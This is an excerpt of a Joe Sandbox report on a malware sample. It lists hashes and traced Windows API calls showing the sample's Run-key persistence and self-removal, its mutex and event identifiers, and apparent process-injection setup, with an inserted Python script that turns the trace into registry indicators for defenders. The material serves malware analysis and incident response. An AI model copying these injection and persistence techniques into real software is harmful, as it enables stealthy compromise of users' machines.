                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                            • String ID:
                                                                            • API String ID: 3201519519-0
                                                                            • Opcode ID: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                            • Instruction ID: 2fe4e219268ab508a79425c936ffa4f6c42cbfd1004033172ec4283faa31aaa9
                                                                            • Opcode Fuzzy Hash: bde5e825d952b8bc264e53f7330cbdb12c80d4a380823f7c5303a601c813b495
                                                                            • Instruction Fuzzy Hash: FD21C7B5D00209EFCB04DF98C894AEEB7B5FF48314F54859AE825A7341D738AA51CF90
                                                                            APIs
                                                                              • Part of subcall function 007E0870: WSACreateEvent.WS2_32 ref: 007E0876
                                                                              • Part of subcall function 007E0870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                              • Part of subcall function 007E0870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                              • Part of subcall function 007E0870: WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DF78A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseCreateEventsInfoLocaleMultipleSelectWait___crt
                                                                            • String ID:
                                                                            • API String ID: 3201519519-0
                                                                            • Opcode ID: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                            • Instruction ID: be6557e41130bcd113f3bead87f5704bbf08f211290a1393bca78cfd2dea07a2
                                                                            • Opcode Fuzzy Hash: 7e220d92a5a058f8ef472217d2b8b48152e192a83d116e355737832c339dc423
                                                                            • Instruction Fuzzy Hash: B621D8B5D00209EFDB04DF98C884AEEBBB5FF48314F50859AE825A7385D7389A51CF90
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0002A90E), ref: 007EA955
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 2cbebf97eeabf4b37e3eb3e0830015d536233b21857b88e33bd9b772033d90b0
                                                                            • Instruction ID: 6d1cd2baa6fb0d6324c8996d3de796fd34a5a92c7684c58fbc9265d131e8865f
                                                                            • Opcode Fuzzy Hash: 2cbebf97eeabf4b37e3eb3e0830015d536233b21857b88e33bd9b772033d90b0
                                                                            • Instruction Fuzzy Hash: 599002E129218866460017755C4E51527905B4C65AB4344A16101C4156DB58A082D51A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: N@
                                                                            • API String ID: 0-1509896676
                                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                            • Instruction ID: d74b4b2b190a6a46cf22da180cf4205b9f8a63dea72a4001ef3e74b2e9750a9d
                                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                            • Instruction Fuzzy Hash: A5615AB1900319CFCB18CF49C4946AABBF2FF84310F5AC5AED9095B362D7B59955CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 31558104a317b0c24d7d5327b84cbf52693d656ac7f0eb4bfecfa78fb2be7474
                                                                            • Instruction ID: f9fb06f9f2597bc81e916aaa0e5a3d554771993f7efea87cdd88ac89a6c5b108
                                                                            • Opcode Fuzzy Hash: 31558104a317b0c24d7d5327b84cbf52693d656ac7f0eb4bfecfa78fb2be7474
                                                                            • Instruction Fuzzy Hash: 46F17C71D0111DDBDF18CF9DD9919EEBBB2BF88308F248259D422B7345C634AA52CB98
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                            • Instruction ID: 6cf1fc7e1076bda7ba948c747974ba813bfc9a7358da7b25862c23907ac62424
                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                            • Instruction Fuzzy Hash: 33C1B673D1B9F649C735462F045823FEEA26E85B4832FC395DCD03F289C62A6D1596E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                            • Instruction ID: f4c2506592ca7412a75e608a89bbecb455f26e2f585badec1b7ac550fcf85dd9
                                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                            • Instruction Fuzzy Hash: 4DC1A173D0B9F245CB36462F041823FEEA26E95B4932FC395DCD03F299C62A6D1596E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                            • Instruction ID: dd63af8d5ceb46b0a4ae782b2112bee8f8142c41f8da4d659aa3b3c19eda8cbc
                                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                            • Instruction Fuzzy Hash: 4FC19373D0F9F6068B36462F045823FEEA16E85B4932FC395DCD03F289C62A6D0596E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                            • Instruction ID: dad6b1fc1b002f20fedd74e77e391273db258475079ac5c03f473837991d393a
                                                                            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                            • Instruction Fuzzy Hash: 35B18373D0B9F2058B36863F045823BEEA26E95B4532FC795DCD03F289C62AAD1595E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9616ce662cd67d5e7a25f75f22f646e532e03bafe99c2c4478e0c7084aee4a7f
                                                                            • Instruction ID: 6c5e6ee05ef502a9e9d484f96803a7e1bde87bf69451d2c3c3b74f88b57a1623
                                                                            • Opcode Fuzzy Hash: 9616ce662cd67d5e7a25f75f22f646e532e03bafe99c2c4478e0c7084aee4a7f
                                                                            • Instruction Fuzzy Hash: 24E15C71E0111DDBDF18CF9DD9919EEBBB2BF84308F14C259D422B7205D634AA52CB98
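The entry that follows is the sample's self-removal routine: it formats key names with wnsprintfW and deletes them under HKCU (hive constant 80000001) with samDesired 00000200, which is KEY_WOW64_32KEY, so the 32-bit registry view on a 64-bit host; it opens the HKCU and HKLM CurrentVersion\Run keys and deletes one value in each, the HKLM one by the GUID name {AB1F3E47-AEF1-400E-A108-233A046C3A34} while the HKCU one is logged only as the pointer 00836FC8; and it builds a path from SHGetKnownFolderPath and calls DeleteFileW on it. Lines in this form are what a responder turns into host IOCs. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses the "API.MODULE(args), ref: address" listing format, decodes the HKEY and KEY_WOW64_* constants (standard Win32 values, not taken from the report) and pairs each RegDeleteValueW with the key most recently opened in the same subcall function. Its sample input is a copy of the lines from the entry below; the pairing heuristic is an assumption about listing order, not something the report states, and an all-hex-digit value name would be misread as an unresolved pointer.

```python
"""Parse Joe Sandbox 'APIs' listing lines into registry IOCs (added example, not report code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the cleanup routine's calls, copied from the report entry below.
SAMPLE = r"""
• wnsprintfW.SHLWAPI ref: 007D5A98
• RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5AB4
  • Part of subcall function 007D2680: RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D269B
  • Part of subcall function 007D2680: RegDeleteValueW.ADVAPI32(?,00836FC8,?,?,007C1109), ref: 007D26AE
  • Part of subcall function 007D2680: RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26B8
  • Part of subcall function 007D2680: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D26D5
  • Part of subcall function 007D2680: RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,007C1109), ref: 007D26E8
  • Part of subcall function 007D2680: RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26F2
  • Part of subcall function 007D3160: SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D3196
  • Part of subcall function 007D3160: DeleteFileW.KERNEL32(00000000), ref: 007D31C3
"""

# One listing line: optional "Part of subcall function ADDR:", then API.MODULE,
# optional "(arg,arg,...)", then "ref: ADDR". Unresolved arguments appear as "?".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Standard Win32 constants (winreg.h / winnt.h), not values taken from the report.
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
WOW64_FLAGS = {0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str               # call-site address
    sub: Optional[str]     # subcall function address, None for the function itself


@dataclass
class RegistryIoc:
    kind: str              # "open_key", "delete_value" or "delete_key"
    path: str              # HIVE\subkey, with "?" where the tracer could not resolve it
    value: Optional[str] = None      # value name; None when only a pointer was logged
    flags: List[str] = field(default_factory=list)
    ref: str = ""


def parse_calls(text: str) -> List[ApiCall]:
    calls = []
    for line in filter(str.strip, text.splitlines()):
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def hexval(tok: str) -> Optional[int]:
    """Hex token to int; None for '?' and other non-numeric tokens."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]+", tok) else None


def extract_registry_iocs(calls: List[ApiCall]) -> List[RegistryIoc]:
    """Pair each RegDeleteValueW with the key most recently opened in the same
    (sub)function. That pairing assumes the listing keeps call order; the report
    does not state it, so treat the derived path as a lead, not a fact."""
    iocs: List[RegistryIoc] = []
    last_opened = {}       # subcall address -> last key path opened there
    for c in calls:
        if c.api in ("RegOpenKeyW", "RegOpenKeyExW") and len(c.args) >= 2:
            path = HIVES.get(hexval(c.args[0]), c.args[0]) + "\\" + c.args[1]
            last_opened[c.sub] = path
            iocs.append(RegistryIoc("open_key", path, ref=c.ref))
        elif c.api == "RegDeleteValueW" and len(c.args) >= 2:
            # An all-hex token (e.g. 00836FC8) is a pointer the tracer left unresolved.
            name = None if c.args[1] == "?" or hexval(c.args[1]) is not None else c.args[1]
            iocs.append(RegistryIoc("delete_value", last_opened.get(c.sub, "?"), name, ref=c.ref))
        elif c.api == "RegDeleteKeyExW" and len(c.args) >= 3:
            path = HIVES.get(hexval(c.args[0]), c.args[0]) + "\\" + c.args[1]
            sam = hexval(c.args[2]) or 0
            flags = [n for bit, n in WOW64_FLAGS.items() if sam & bit]
            iocs.append(RegistryIoc("delete_key", path, flags=flags, ref=c.ref))
    return iocs


def persistence_value_names(iocs: List[RegistryIoc]) -> List[str]:
    """Resolved value names the sample touches under a CurrentVersion\\Run key."""
    return sorted({i.value for i in iocs if i.kind == "delete_value" and i.value
                   and i.path.lower().endswith("\\currentversion\\run")})


if __name__ == "__main__":
    found = extract_registry_iocs(parse_calls(SAMPLE))
    for ioc in found:
        print(ioc)
    print("Run-key value names to check on a host:", persistence_value_names(found))
```

Run as a script to print the decoded IOCs. On a suspect host, the names returned by persistence_value_names are what to query in both Run keys, and the KEY_WOW64_32KEY flag on the RegDeleteKeyExW calls says the sample addressed the 32-bit registry view, so check that view as well as the 64-bit one.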
                                                                            APIs
                                                                            • wnsprintfW.SHLWAPI ref: 007D5A98
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5AB4
                                                                            • wnsprintfW.SHLWAPI ref: 007D5AE4
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5B00
                                                                            • wnsprintfW.SHLWAPI ref: 007D5B30
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5B4C
                                                                            • wnsprintfW.SHLWAPI ref: 007D5B7C
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5B98
                                                                              • Part of subcall function 007D2680: RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D269B
                                                                              • Part of subcall function 007D2680: RegDeleteValueW.ADVAPI32(?,00836FC8,?,?,007C1109), ref: 007D26AE
                                                                              • Part of subcall function 007D2680: RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26B8
                                                                              • Part of subcall function 007D2680: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D26D5
                                                                              • Part of subcall function 007D2680: RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,007C1109), ref: 007D26E8
                                                                              • Part of subcall function 007D2680: RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26F2
                                                                              • Part of subcall function 007D3160: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,007D5BA8), ref: 007D317A
                                                                              • Part of subcall function 007D3160: SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D3196
                                                                              • Part of subcall function 007D3160: __snwprintf.LIBCMT ref: 007D31B7
                                                                              • Part of subcall function 007D3160: DeleteFileW.KERNEL32(00000000), ref: 007D31C3
                                                                              • Part of subcall function 007D3160: CoTaskMemFree.COMBASE(?), ref: 007D31CD
                                                                              • Part of subcall function 007D3160: LocalFree.KERNEL32(00000000), ref: 007D31D7
                                                                              • Part of subcall function 007D3160: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D31EA
                                                                              • Part of subcall function 007D3160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D31FF
                                                                              • Part of subcall function 007D3160: __snwprintf.LIBCMT ref: 007D3229
                                                                              • Part of subcall function 007D3160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3238
                                                                              • Part of subcall function 007D3160: __snwprintf.LIBCMT ref: 007D3263
                                                                              • Part of subcall function 007D3160: DeleteFileW.KERNEL32(00000000), ref: 007D326F
                                                                              • Part of subcall function 007D3160: RemoveDirectoryW.KERNEL32(00000000), ref: 007D3279
                                                                              • Part of subcall function 007D3160: LocalFree.KERNEL32(00000000), ref: 007D3283
                                                                              • Part of subcall function 007D3160: LocalFree.KERNEL32(00000000), ref: 007D328D
                                                                              • Part of subcall function 007D3160: CoTaskMemFree.COMBASE(?), ref: 007D3297
                                                                              • Part of subcall function 007D2F20: OpenEventW.KERNEL32(00100002,00000000,{16B194B1-19CC-4C52-92E2-1BFAC8473D8C}), ref: 007D2F3F
                                                                              • Part of subcall function 007D2F20: SetEvent.KERNEL32(00000000), ref: 007D2F5B
                                                                              • Part of subcall function 007D2F20: CloseHandle.KERNEL32(00000000), ref: 007D2F68
                                                                              • Part of subcall function 007D2F20: OpenMutexW.KERNEL32(00100000,00000000,{8931AB7A-A1AA-4E58-80EA-2B1247F36722}), ref: 007D2F84
                                                                              • Part of subcall function 007D2F20: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007D2FA2
                                                                              • Part of subcall function 007D2F20: CloseHandle.KERNEL32(00000000), ref: 007D2FAF
                                                                              • Part of subcall function 007D2F20: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D2FC5
                                                                              • Part of subcall function 007D2F20: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2FDA
                                                                              • Part of subcall function 007D2F20: __snwprintf.LIBCMT ref: 007D301F
                                                                              • Part of subcall function 007D2F20: lstrlenW.KERNEL32(00000000), ref: 007D302E
                                                                              • Part of subcall function 007D2F20: _memset.LIBCMT ref: 007D306A
                                                                              • Part of subcall function 007D2F20: GetFileAttributesW.KERNEL32(00000000), ref: 007D30A5
                                                                              • Part of subcall function 007D2F20: LocalFree.KERNEL32(00000000), ref: 007D30F1
                                                                              • Part of subcall function 007D2F20: CoTaskMemFree.COMBASE(?), ref: 007D30FE
                                                                              • Part of subcall function 007D2E00: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D5BB2,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E13
                                                                              • Part of subcall function 007D2E00: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E28
                                                                              • Part of subcall function 007D2E00: __snwprintf.LIBCMT ref: 007D2E61
                                                                              • Part of subcall function 007D2E00: lstrlenW.KERNEL32(00000000), ref: 007D2E6D
                                                                              • Part of subcall function 007D2E00: _memset.LIBCMT ref: 007D2E97
                                                                              • Part of subcall function 007D2E00: GetFileAttributesW.KERNEL32(00000000), ref: 007D2EC0
                                                                              • Part of subcall function 007D2E00: LocalFree.KERNEL32(00000000), ref: 007D2EFD
                                                                              • Part of subcall function 007D2E00: CoTaskMemFree.COMBASE(007D5BB2), ref: 007D2F07
                                                                              • Part of subcall function 007D2AB0: CoInitializeEx.COMBASE(00000000,00000000), ref: 007D2AE0
                                                                              • Part of subcall function 007D2AB0: CoUninitialize.COMBASE ref: 007D2DDD
                                                                              • Part of subcall function 007D0010: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D6B10,00831178,007D6B10), ref: 007D0023
                                                                              • Part of subcall function 007D0010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D0034
                                                                              • Part of subcall function 007D0010: wnsprintfW.SHLWAPI ref: 007D005F
                                                                              • Part of subcall function 007D0010: lstrlenW.KERNEL32(?), ref: 007D0070
                                                                              • Part of subcall function 007D0010: CoTaskMemFree.COMBASE(?), ref: 007D007F
                                                                            • _memset.LIBCMT ref: 007D5C2A
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 007D5C65
                                                                            • SHFileOperationW.SHELL32(?), ref: 007D5C82
                                                                            • LocalFree.KERNEL32(?), ref: 007D5CB1
                                                                            • _memset.LIBCMT ref: 007D5D09
                                                                            • __snwprintf.LIBCMT ref: 007D5D2E
                                                                            • _memset.LIBCMT ref: 007D5D4D
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007D5D61
                                                                            • _memset.LIBCMT ref: 007D5D86
                                                                            • __snwprintf.LIBCMT ref: 007D5DB1
                                                                            • __snwprintf.LIBCMT ref: 007D5DD5
                                                                            • _memset.LIBCMT ref: 007D5DF2
                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000044,?), ref: 007D5E36
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D5E45
                                                                            • DuplicateHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000002), ref: 007D5E7D
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D5E8C
                                                                            • DuplicateHandle.KERNEL32(?,00000228,?,00000000,00000000,00000001,00000002), ref: 007D5EC4
                                                                            • LoadLibraryW.KERNEL32(?), ref: 007D5EDA
                                                                            • _memset.LIBCMT ref: 007D5EFE
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 007D5F14
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 007D5F2E
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D5F48
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F5C
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F70
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F84
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F98
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5FAC
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5FBD
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D5FD1
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D5FE5
                                                                            • LocalFree.KERNEL32(?), ref: 007D6079
                                                                            • CloseHandle.KERNEL32(?), ref: 007D609A
                                                                            • CloseHandle.KERNEL32(?), ref: 007D60A7
                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 007D60BF
                                                                            • LocalFree.KERNEL32(?), ref: 007D60CC
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007D60DE
                                                                            • SetEvent.KERNEL32(00000000), ref: 007D60FA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6107
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrcpy$Delete__snwprintf_memset$CloseHandle$AllocFile$FolderKnownOpenPathTaskwnsprintf$EventProcesslstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindows
                                                                            • String ID: %s%s$D$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsServer2024$WindowsServer2024.exe${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${70F925A9-13A6-49C0-913B-C685A8E9B495}${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 113497637-1127096856
                                                                            • Opcode ID: 0926fdc78ce09d5d05287994c43e2c4e8df4ac80c3cde2cb7d2275031a35aa4b
                                                                            • Instruction ID: c420f9e1b1dd44c3415207670782ec1b76badbae725b839b13695067fc65a9fa
                                                                            • Opcode Fuzzy Hash: 0926fdc78ce09d5d05287994c43e2c4e8df4ac80c3cde2cb7d2275031a35aa4b
                                                                            • Instruction Fuzzy Hash: 09222DB1E012289BDB24DF60DD49FE9B778BB89700F0045D9F60DA6281EB795B84CF51
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,{F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}), ref: 007C1CA2
                                                                            • _memset.LIBCMT ref: 007C1CCC
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C1CE0
                                                                            • _memset.LIBCMT ref: 007C1D05
                                                                              • Part of subcall function 007DC1E0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007C108E), ref: 007DC1EB
                                                                              • Part of subcall function 007DC1E0: GetProcAddress.KERNEL32(007C108E,IsWow64Process), ref: 007DC204
                                                                            • __snwprintf.LIBCMT ref: 007C1D2F
                                                                            • __snwprintf.LIBCMT ref: 007C1D51
                                                                            • _memset.LIBCMT ref: 007C1D70
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C1D84
                                                                            • LocalAlloc.KERNEL32(00000040,00000DF0), ref: 007C1DA3
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 007C1DC1
                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 007C1DD9
                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 007C1DF3
                                                                            • lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 007C1E14
                                                                            • lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 007C1E2B
                                                                            • lstrcpyW.KERNEL32(-00000648,00000000), ref: 007C1E42
                                                                            • lstrcpyW.KERNEL32(-00000850,{4042FD4A-C237-4861-80BD-1FA24BEF8CE4}), ref: 007C1E59
                                                                            • lstrcpyW.KERNEL32(-00000A58,?), ref: 007C1E73
                                                                            • lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 007C1E8A
                                                                            • lstrcpyA.KERNEL32(-00000D28,CoInitialize), ref: 007C1EA2
                                                                            • lstrcpyA.KERNEL32(-00000D8C,IIDFromString), ref: 007C1EBA
                                                                            • lstrcpyA.KERNEL32(-00000CC4,ExitProcess), ref: 007C1ED1
